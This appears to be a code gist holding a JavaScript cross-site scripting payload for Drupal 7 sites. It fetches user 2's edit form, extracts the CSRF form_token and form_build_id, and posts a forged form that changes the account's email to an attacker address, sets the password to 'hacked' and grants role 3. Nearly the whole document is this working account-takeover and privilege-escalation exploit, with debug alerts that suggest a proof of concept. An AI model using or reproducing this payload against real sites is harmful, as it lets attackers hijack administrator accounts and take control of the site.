Drupal 7 xss change password

gistfile1.js

// Test for  the presence of jquery.
if (typeof jQuery == 'function') {
  // Fetch a correct token from the user edit form because we will need it to
  // successfully submit the user edit form later.
  // TODO: Include a check to increase the chance that the current user is admin,
  // which will reduce the number of access denied error messages in the log.
  jQuery.get(Drupal.settings.basePath + 'user/2/edit',
    function (data, status) {
      if (status == 'success') {
        // Extract the token and other required data
        var matches = data.match(/name="name" value="([a-zA-Z0-9]*)"/);
        var name = matches[1];
        var mail = 'greg+evilguy@card.com';
        var matches = data.match(/name="form_token" value="([a-zA-Z0-9_-]*)"/);
        var token = matches[1];
        alert('token: ' + token);
        var matches = data.match(/name="form_build_id" value="(form-[a-zA-Z0-9_-]*)"/);
        var build_id = matches[1];
        alert('build_id: ' + build_id);
        // Post the minimum amount of fields. Other fields get their default values.
        var payload = {
          "name": name,
          "mail": mail,
          "status": 1,
          "form_id": 'user_profile_form',
          "form_token": token,
          "form_build_id" : build_id,
          "pass[pass1]": 'hacked',
          "pass[pass2]": 'hacked',
          "roles[3]": 3,
          "op" : 'save'
        };
        console.log(payload);
        var posting = jQuery.post(Drupal.settings.basePath +  'user/2/edit', payload, function(data) {
          console.log(data);
        });
        alert('done');
        }
      }
    );
}
else {
  alert('No jquery found? That is odd.');
}